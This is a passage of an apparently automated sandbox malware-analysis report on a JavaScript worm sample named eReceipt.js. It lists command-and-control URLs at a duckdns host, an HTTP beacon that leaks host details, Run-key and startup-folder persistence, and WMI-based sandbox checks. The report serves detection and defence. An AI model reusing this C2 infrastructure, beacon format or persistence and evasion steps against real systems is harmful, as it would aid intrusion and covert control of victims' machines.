      Source: wscript.exe, 00000009.00000002.881803714.0000011D6D8B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreMcroWinowsC
      Source: wscript.exe, 00000005.00000002.884584250.000001B3A1169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreT
      Source: wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreW&&1
      Source: wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vreba&
      Source: wscript.exe, 00000000.00000002.881896029.000001C6DCCF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VrebiBuZXcgQWN0aXZlWE
      Source: wscript.exe, 00000000.00000002.882571223.000001C6DD870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreenP
      Source: wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vrem
      Source: wscript.exe, 00000005.00000003.814806136.000001B3A1155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.814853193.000001B3A1161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.814903129.000001B3A1167000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vreo
      Source: wscript.exe, 00000000.00000002.882571223.000001C6DD870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vres
      Source: wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vreuc3BsaXQo
      Source: wscript.exe, 00000009.00000002.882911583.0000011D6E4C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.884292781.00000244B0070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
      Source: unknownHTTP traffic detected: POST /Vre HTTP/1.1Accept: */*User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: zeegod.duckdns.org:9003Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
      Source: unknownDNS traffic detected: queries for: zeegod.duckdns.org

      System Summary

      barindex
      Wscript called in batch mode (surpress errors)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Potential malicious VBS/JS script found (suspicious encoded strings)
      Source: eReceipt.jsInitial sample: Suspicious string win32_ D2LUMZJF
      Source: 00000009.00000002.880440429.0000011D6BAC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000010.00000002.882089368.00000244AF3F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000000.00000002.881750287.000001C6DCC58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000002.882946701.000001B3A0557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
      Source: 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000010.00000002.880524674.00000244AD5E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000003.815386378.000001B39E7A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000009.00000002.880465658.0000011D6BAE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000002.881460459.000001B39E783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
      Source: 00000010.00000002.880727385.00000244AD604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000000.00000002.881896029.000001C6DCCF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000009.00000002.881676533.0000011D6D82C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000000.00000002.881056008.000001C6DADBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000003.390360933.000001B3A054F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
      Source: 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
      Source: 00000005.00000002.881618761.000001B39E7A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000000.00000003.353378984.000001C6DCC2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000003.815331689.000001B3A0557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000010.00000003.457112240.00000244AF413000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000000.00000002.880778085.000001C6DAD96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: Process Memory Space: wscript.exe PID: 3908, type: MEMORYSTRMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: Process Memory Space: wscript.exe PID: 6860, type: MEMORYSTRMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: Process Memory Space: wscript.exe PID: 5768, type: MEMORYSTRMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: Process Memory Space: wscript.exe PID: 792, type: MEMORYSTRMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: eReceipt.jsInitial sample: Strings found which are bigger than 50
      Source: eReceipt.jsReversingLabs: Detection: 19%
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\eReceipt.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winJS@15/6@4/2
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: eReceipt.jsString : entropy: 5.55, length: 43961, content: 'dHJ5ewp2YXIgbG9uZ1RleHQxID0gIkt5Z2hRWEp5WVhrdWNISnZkRzkwZVhCbExtWnZja1ZoWTJnZ1B5QkJjbkpoZVM1d2NtOTBGo to definition

      Boot Survival

      barindex
      Creates multiple autostart registry keys
      Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 00FAYTSXGUJump to behavior
      Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 1NBCD3W1VRJump to behavior
      Drops script or batch files to the startup folder
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.jsJump to dropped file
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.jsJump to dropped file
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js\:Zone.Identifier:$DATAJump to behavior
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js\:Zone.Identifier:$DATAJump to behavior
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js\:Zone.Identifier:$DATA
      Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 1NBCD3W1VRJump to behavior
      Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 1NBCD3W1VRJump to behavior
      Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 00FAYTSXGUJump to behavior
      Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 00FAYTSXGUJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 9003 -> 49772
      Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: wscript.exe, 0000000C.00000002.881090970.00000171E043A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}2
      Source: wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I-
